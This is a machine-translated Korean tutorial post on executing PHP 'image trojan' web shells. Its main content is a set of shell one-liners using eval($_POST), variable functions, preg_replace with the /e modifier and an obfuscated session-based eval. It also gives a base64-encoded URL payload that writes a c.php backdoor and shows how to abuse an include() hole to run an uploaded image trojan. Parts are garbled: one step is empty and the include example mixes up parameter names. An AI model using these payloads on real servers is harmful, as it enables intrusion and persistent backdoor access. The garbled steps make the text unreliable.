>백엔드 개발 >PHP 문제 >PHP 이미지 트로이 목마를 실행하는 방법

PHP 이미지 트로이 목마를 실행하는 방법

王林
王林원래의
2019-09-19 11:54:1912589검색

PHP 이미지 트로이 목마를 실행하는 방법

PHP 이미지 Trojan 실행 방법

1. 표준 작성 방법으로 eval

@eval ($_POST['code']);

을 통해 PHP 코드를 직접 실행합니다. ) 종류)

@$_GET['a']($_GET['code']);

3. 사용방법 : url에서 아래의 매개변수를 전달하고 실행 후 현재 디렉터리에 c.php 파일이 생성됩니다

/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,
base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

매개변수가 eval일 경우 에러 발생 eval이 함수가 아니기 때문에 보고됩니다. 트로이 목마 생성이 실패합니다. 주장하면 동일한 오류가 보고되지만 트로이 목마가 생성됩니다.

4. preg_replace를 사용하여 코드를 실행합니다(앞에 있는 아무 문자열이나 사용하면 됩니다. 다르면 명령이 여러 번 실행될 수 있습니다)

@preg_replace("/re/e", $_POST['code'], "re");

5.

6. 파일 이름 바꾸기

session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

include 취약점을 사용하는 방법

때때로 일부 이미지 트로이 목마가 업로드되지만 실행되지 않는 경우가 있습니다. 포함 취약점이 있으면 이미지 트로이 목마가 발생할 수 있습니다. 처형되다.

php 코드에 include($_GET['controller'])가 있고 url 경로가 /index.php?controller=user라면 이는 해당 컨트롤러를 기반으로 실행하는 코드인 것으로 보입니다. 그러나 URL 경로의 매개변수가 /index.php?uid=/upload/images/muma.jpg로 변경되면 이때 트로이 목마가 실행됩니다.

위 내용은 참고용입니다!

추천 튜토리얼:

PHP 비디오 튜토리얼

위 내용은 PHP 이미지 트로이 목마를 실행하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.